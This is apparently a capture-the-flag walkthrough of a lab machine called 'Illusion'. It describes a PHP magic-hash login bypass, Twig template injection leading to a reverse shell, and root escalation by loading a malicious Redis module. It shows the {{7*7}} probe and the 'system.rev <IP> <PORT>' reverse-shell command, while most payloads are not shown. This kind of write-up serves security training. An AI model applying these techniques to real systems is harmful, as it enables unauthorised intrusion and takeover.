Illusion
Gaining Access
Nmap scan:
We can start proxying traffic through Burp.
Web Enum -> Magic Hashes
Port 80 presents a corporate web page with a Login:
The login page is basic and operates in PHP:
Default credentials don't work here. Brute forcing also doesn't work. Since this runs on PHP, we can try some Magic Hashes by submitting this request:
This works because the Location
header points to dashboard.php
now.
Orders -> SSTI
The dashboard is simple.
If we submit any queries, we can see our order name pop up on the top:
Since this website runs on PHP and the input value is printed out on screen, I wanted to test for SSTI by using {{7*7}}
as the name of the order, and it works:
On Hacktricks, there's a whole section for Twig (PHP), and I tried their payload to run id
:
This confirms that SSTI works and we have RCE on the machine. Sending this payload gets us a reverse shell:
Privilege Escalation
Redis Creds -> RCE
Within the user's directory, there was a Redis related file that contained a hash:
Checking the listening ports using netstat
reveals that port 6379 is listening and is likely Redis:
We can port forward this using chisel
. Afterwards, we can access the Redis database using redis-cli
. Attempts to run commands fail because we aren't authenticated:
In this case, we can try the hash that we found earlier.
There was nothing within the database that was interesting, but I did want to know who was running it. A quick ps -elf
reveals that the root
user is running it:
Since root
is running it and we can login, this means that we can also load any module that we want. This repository has a module that works:
Compile and upload the .so
file to the machine. Then, load it within redis-cli
:
We can get a reverse shell via system.rev <IP> <PORT>
:
Rooted!
Last updated